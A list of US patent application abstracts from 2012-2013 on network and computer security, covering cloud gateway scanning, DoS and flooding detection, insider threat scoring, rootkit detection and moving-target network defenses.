20130191914CLOUD-BASED GATEWAY SECURITY SCANNING - Some embodiments of cloud-based gateway security scanning have been presented. In one embodiment, some data packets are received sequentially at a gateway device. The data packets constitute at least a part of a file being addressed to a client machine coupled to the gateway device. The gateway device forwards an identification of the file to a remote datacenter in parallel with forwarding the data packets to the client machine. The datacenter performs signature matching on the identification and returns a result of the signature matching to the gateway device. The gateway device determining whether to block the file from the client machine based on the result of the signature matching from the datacenter.07-25-2013
20130191912SECURE NETWORK TOPOLOGY ON A VIRTUALIZED SERVER - Generally, this disclosure describes a secure network topology on a virtualized server (and methods thereof). A virtualization management module is deployed as part of a software layer of a virtualized server system. The virtualization management module generates an internal network among the virtual machines and controls access to the network. The virtualization management module translates incoming and outgoing traffic between the virtual machines and an external internet IP address, thus keeping the virtual machines indirectly coupled to the external network. The virtualization management module also provides remote administration and control over each virtual machine (or collection of virtual machines).07-25-2013
20130191913DYNAMICALLY SCANNING A WEB APPLICATION THROUGH USE OF WEB TRAFFIC INFORMATION - Collecting log file data from at least one log file. From the collected log file data, at least one HTTP request can be generated to exercise a web application to perform a security analysis of the web application. The HTTP request can be communicated to the web application. At least one HTTP response to the HTTP request can be received. The HTTP response can be analyzed to perform validation of the web application. Results of the validation can be output.07-25-2013
20120291126Balancing Malware Rootkit Detection with Power Consumption on Mobile Devices - The subject disclosure presents a novel technique for balancing the tradeoff between security monitoring and energy consumption on mobile devices. Security/energy tradeoffs for host-based detectors focusing on rootkits are analyzed along two axes: a scanning frequency, and a surface of attack. Experimental results are applied to a hypervisor-based framework, and a sweet spot is identified to minimize both energy consumption and a window of vulnerability for critical operating system objects such as code pages and kernel data.11-15-2012
20120291125DYNAMIC AND SELECTIVE RESPONSE TO CYBER ATTACK FOR TELECOMMUNICATIONS CARRIER NETWORKS - The disclosed subject matter provides a response to a cyber attack on a carrier network. The response can be based on inspection of traffic flowing through a carrier network. The response can automatically adapt the traffic flow in response to a perceived threat. Traffic can be adapted by dynamically updating permission variables related to allowing access for user equipment (UE) to a carrier network, withdrawing or denying access to the carrier network for selected UEs. In other embodiments, signaling can be initiated at the carrier network to cause selected UEs to disable transmission of traffic contributing to the traffic flow. Determining a cyber attack condition can be based on predetermined rules associated with the traffic flow. Further, the determination can be performed at a front end of the carrier network to limit exposure of the carrier network to a detected cyber attack.11-15-2012
20120291124CARRIER NETWORK SECURITY INTERFACE FOR FIELDED DEVICES - The disclosed subject matter provides carrier-side security services for fielded devices. In contrast to conventional authentication systems for fielded devices, wherein an end-to-end communications pathway is typically established for authentication of a fielded device by a back-end service provider, authentication and security services can be moved into the carrier network. A security service monitor component can be at the carrier network and can authenticate field components without establishing a communications pathway to the back-end service provider. Further, security service monitor component can provide security services for communications with an authenticated field component. In an aspect, this can allow for centralization of security elements from the periphery of back-end service providers into the carrier network. In a further aspect, security service monitor component can host a security services platform for back-end service providers.11-15-2012
20120017274WEB SCANNING SITE MAP ANNOTATION - A computerized website vulnerability scanner includes a scanning module operable to navigate through a website and scan the website for vulnerabilities, and an annotation module operable to present a map of web pages comprising a part of the website. The annotation module is also operable to receive annotations from a user that are associated with the web pages, and the scanning module is further operable to use the user-provided annotations in subsequently scanning the website.01-19-2012
20120023576INSIDER THREAT CORRELATION TOOL - Systems and methods for calculating threat scores for individuals within an organization or domain are provided. Aspects of the invention relate to computer-implemented methods that form a predictive threat rating for user accounts. In one implementation, a threat score representing a first time period may be calculated. The first threat score may be calculated from a quantification of a plurality of activity violations across a plurality of control groups. Weighting schemes may be applied to certain activities, controls, and/or user accounts. Further embodiments may be configured to consider additional indicators. Further aspects relate to apparatuses configured to execute methods for ranking individual user accounts. Certain embodiments may not block transmissions that violate predefine rules, however, indications of such improper transmission may be considered when constructing a threat rating.01-26-2012
20120030758Automated Diversity Using Return Oriented Programming - A method of automatically creating functionally and structurally diverse equivalent copies of software executables using return oriented programming for the purpose of passing through a filter and other purposes includes starting with a program and a target runtime environment, creating a return oriented instruction library having a plurality of code fragments which end in a ‘return’ instruction from the program and chaining fragments together to automatically form diverse equivalent copies of software executables using return oriented programming.02-02-2012
20120030757LOGIN INITIATED SCANNING OF COMPUTING DEVICES - Embodiments of the invention relate to systems, methods, and computer program products for login initiated remote scanning of computer devices. The present invention detects login to the network via access management systems. The login data provides information that identifies the device so that the device can be checked against a scan database to determine if and when a previous scan occurred. Based on the findings in the scan database determinations are made as to whether to perform a scan. Additionally, the level of scanning can be determined based on previous scan dates and previous scan results, which may dictate customized scanning In addition, the priority of the impending scan may be dictated by previous scan dates and results. Further embodiments provide for assessing risk, such as risk scoring or the like, concurrently or in near-real-time with the completion of the scan so that alerts may be communicated.02-02-2012
20130198840SYSTEMS, METHODS AND COMPUTER PROGRAMS PROVIDING IMPACT MITIGATION OF CYBER-SECURITY FAILURES - Disclosed is a method and system to operate a governed data processing system in concert with a governing data processing system. The method includes operating a secure governing data processing system to monitor operation of at least one governed data processing system to detect a deviation from modeled user and governed data processing system behavior. The method further includes, upon detecting a deviation from the modeled behavior, taking proactive action to mitigate an occurrence of a potential adverse result of an occurrence of a cyber-security threat.08-01-2013
20130198838METHOD AND APPARATUS FOR PROVIDING SECURITY TO DEVICES - Systems, methods, and apparatus are provided for generating verification data that may be used for validation of a wireless transmit-receive unit (WTRU). The verification data may be generated using a tree structure having protected registers, represented as root nodes, and component measurements, represented as leaf nodes. The verification data may be used to validate the WTRU. The validation may be performed using split-validation, which is a form of validation described that distributes validation tasks between two or more network entities. Subtree certification is also described, wherein a subtree of the tree structure may be certified by a third party.08-01-2013
20130198839SYSTEMS AND METHODS FOR DETECTING AND PREVENTING FLOODING ATTACKS IN A NETWORK ENVIRONMENT - A method for processing network traffic data includes receiving a packet, and determining whether the packet is a previously dropped packet that is being retransmitted. A method for processing network traffic content includes receiving a plurality of headers, the plurality of headers having respective first field values, and determining whether the first field values of the respective headers form a first prescribed pattern. A method for processing network traffic content includes receiving a plurality of packets, and determining an existence of a flooding attack without tracking each of the plurality of packets with a SYN bit.08-01-2013
20120066763Insider Threat Correlation Tool - Systems and methods for calculating threat scores for individuals within an organization or domain are provided. Aspects of the invention relate to computer-implemented methods that form a predictive threat rating for user accounts. In one implementation, a first threat score representing a first time period may be calculated. The first threat score may be compared with aspects of the same user accounts for a second time period. Weighting schemes may be applied to certain activities, controls, and/or user accounts. Further aspects relate to apparatuses configured to execute methods for ranking individual user accounts. Certain embodiments may not block transmissions that violate predefine rules, however, indications of such improper transmission may be considered when constructing a threat rating. Blocked transmissions enforced upon a user account may also be received. Certain activity, such as accessing the internet, may be monitored for the presence of a security threat and/or an ethics threat.03-15-2012
20130205390NETWORK ASSISTED FRAUD DETECTION APPARATUS AND METHODS - Methods and apparatus for detecting fraudulent device operation. In one exemplary embodiment of the present disclosure, a device is issued a user access control client that is uniquely associated with a shared secret that is securely stored within the network and the access control client. Subsequent efforts to activate or deactivate the access control client require verification of the shared secret. Each change in state includes a change to the shared secret. Consequently, requests for a change to state which do not have the proper shared secret will be disregarded, and/or flagged as fraudulent.08-08-2013
20130205391Formal Analysis of the Quality and Conformance of Information Flow Downgraders - Mechanisms for evaluating downgrader code in application code with regard to one or more security guidelines are provided. Downgrader code in application code is identified, where the downgrader code is a portion of code in the application code that operates on an information flow of the application code to ensure confidentiality of information input to the downgrader code, in the output of the downgrader code. Processes of the downgrader code are evaluated against security guidelines to determine if the processes violate the security guidelines. A notification is generated in response to the evaluation indicating that the processes of the downgrader code violate the security guidelines. The notification is output to a computing device for consideration.08-08-2013
20120072984REGULATING ATOMIC MEMORY OPERATIONS TO PREVENT DENIAL OF SERVICE ATTACK - In one embodiment, the present invention includes a method for identifying a termination sequence for an atomic memory operation executed by a first thread, associating a timer with the first thread, and preventing the first thread from execution of a memory cluster operation after completion of the atomic memory operation until a prevention window has passed. This method may be executed by regulation logic associated with a memory execution unit of a processor, in some embodiments. Other embodiments are described and claimed.03-22-2012
20120072983SYSTEM AND METHOD FOR PRIVACY-ENHANCED CYBER DATA FUSION USING TEMPORAL-BEHAVIORAL AGGREGATION AND ANALYSIS - A method of determining, within a deployed environment over a data communication network, network threats and their associated behaviors. The method includes the steps of acquiring sensor data that identifies a specific contact, normalizing the acquired sensor data to generate transformed sensor data, deriving, for the specific contact from the transformed sensor data, a contact behavior feature vector for each of a plurality of time periods, determining, for the specific contact, scores associated with each of a plurality of classification modules to form a contact score vector, the contact score vector being independent of an identity of the specific contact, identifying a type of the specific contact based on the contact score vector, and determining a threat type, based on the contact behavioral profile and the contact score vector, when the specific contact is determined to be a threat in the identifying step.03-22-2012
20120072982DETECTING POTENTIAL FRAUDULENT ONLINE USER ACTIVITY - One or more techniques and/or systems are disclosed herein for identifying potentially fraudulent use of user generated content (UGC) for an online activity by a user. Server-based information and browser-based information associated with the user is identified and used to create a user signature. The user signature is associated with the UGC for the online activity in a cache-key. The cache-key is compared to a desired threshold for identifying potentially fraudulent use of the UGC for the online activity, where potential fraud may be detected if the cache key meets the desired threshold.03-22-2012
20120096547METHOD FOR DETECTING AN ATTEMPTED ATTACK, RECORDING MEDIUM, AND SECURITY PROCESSOR FOR SAID METHOD - This method in which an attempt to attack a security processor is detected by the security processor itself comprises: 04-19-2012
20120096546Edge server HTTP POST message processing - A CDN edge server process receives an HTTP message, takes a given action with respect to that message, and then forwards a modified version of the message to a target server, typically a server associated with a CDN customer. The process may include an associated intermediate processing agent (IPA) or a sub-processing thread to facilitate the given action. In one embodiment, the message is an HTTP POST, and the given action comprises the following: (i) recognizing the POST, (ii) removing given data from the POST, (iii) issuing an intermediate (or subordinate) request to another process (e.g., a third party server), passing the given data removed from the POST to the process, (iv) receiving a response to the intermediate request, (v) incorporating data received from or associated with the response into a new HTTP message, and (vi) forwarding the new HTTP message onto the target server. In this manner, the given data in the POST may be protected as the HTTP message “passes through” the edge server on its way from the client to the target (merchant) server. In an alternative embodiment, data extracted from the POST message is enhanced by passing the data to an externalized process and adding a derived value (such as a fraud risk score based on the data) back into the message.04-19-2012
20130212675DYNAMIC COMPUTER NETWORK WITH VARIABLE IDENTITY PARAMETERS - Method for communicating data in a computer network involves dynamically modifying at a first location in the computer network a plurality of true values. The true values correctly represent the plurality of identify parameters. These true values are transformed to false values, which incorrectly represent the identity parameters. Subsequently, the identity parameters are modified at a second location to transform the false values back to the true values. The position of the first and/or second locations varies dynamically as part of this process. A bridge transforms identity parameter values when communicating outside the network. Dynamic modification of the identity parameters occurs in accordance with a mission plan that can be modified without interrupting communication of data in the network.08-15-2013
20130212676MISSION MANAGEMENT FOR DYNAMIC COMPUTER NETWORKS - Method for communicating data in a computer network involves dynamically modifying at a first location in the computer network a plurality of true values. The true values correctly represent the plurality of identify parameters. These true values are transformed to false values, which incorrectly represent the identity parameters. Subsequently, the identity parameters are modified at a second location to transform the false values back to the true values. The position of the first and/or second locations varies dynamically as part of this process. A bridge transforms identity parameter values when communicating outside the network. Dynamic modification of the identity parameters occurs in accordance with a mission plan that can be modified without interrupting communication of data in the network.08-15-2013
20130212677Thwarting Attacks that involve Analyzing Hardware Sensor Output - A hardware sensor and a hardware user-input component are integrated in a portable electronic device. The hardware sensor is operable to produce hardware sensor output indicative of orientation or motion or both of the device within its environment. The hardware user-input component has multiple elements operable to accept user input through touch. A user-input driver and the device's operating system are jointly operable to detect touch events involving the elements. A software application stored in the device's memory is executable by the device's processor as a process. A sensor driver or the operating system or both are configured to control what hardware sensor output, if any, is receivable by the process. This control may thwart an attack based on analysis of the hardware sensor output, the attack designed to deduce what user input has been made via multiple elements of the hardware user-input component.08-15-2013
20130212678Altering Sampling Rate to Thwart Attacks that involve Analyzing Hardware Sensor Output - A hardware sensor and a hardware user-input component are integrated in a portable electronic device. The hardware sensor is operable to produce hardware sensor output indicative of orientation or motion or both of the device within its environment. The hardware user-input component has multiple elements operable to accept user input through touch. A user-input driver and the device's operating system are jointly operable to detect touch events involving the elements. A software application stored in the device's memory is executable by the device's processor as a process. A sensor driver or the operating system or both are configured to control what hardware sensor output, if any, is receivable by the process. This control may thwart an attack based on analysis of the hardware sensor output, the attack designed to deduce what user input has been made via multiple elements of the hardware user-input component.08-15-2013
20130212679PROACTIVE TEST-BASED DIFFERENTIATION METHOD AND SYSTEM TO MITIGATE LOW RATE DoS ATTACKS - A low rate DoS attack detection algorithm is used, which relies on a characteristic of the low rate DoS attack in introducing high rate traffic for short periods, and then uses a proactive test based differentiation technique to filter the attack packets. The proactive test defends against DDoS attacks and low rate DoS attacks which tend to ignore the normal operation of network protocols, but it also differentiates legitimate traffic from low rate DoS attack traffic instigated by botnets. It leverages on the conformity of legitimate flows, which obey the network protocols. It also differentiates legitimate connections by checking their responses to the proactive tests which include puzzles for distinguishing botnets from human users.08-15-2013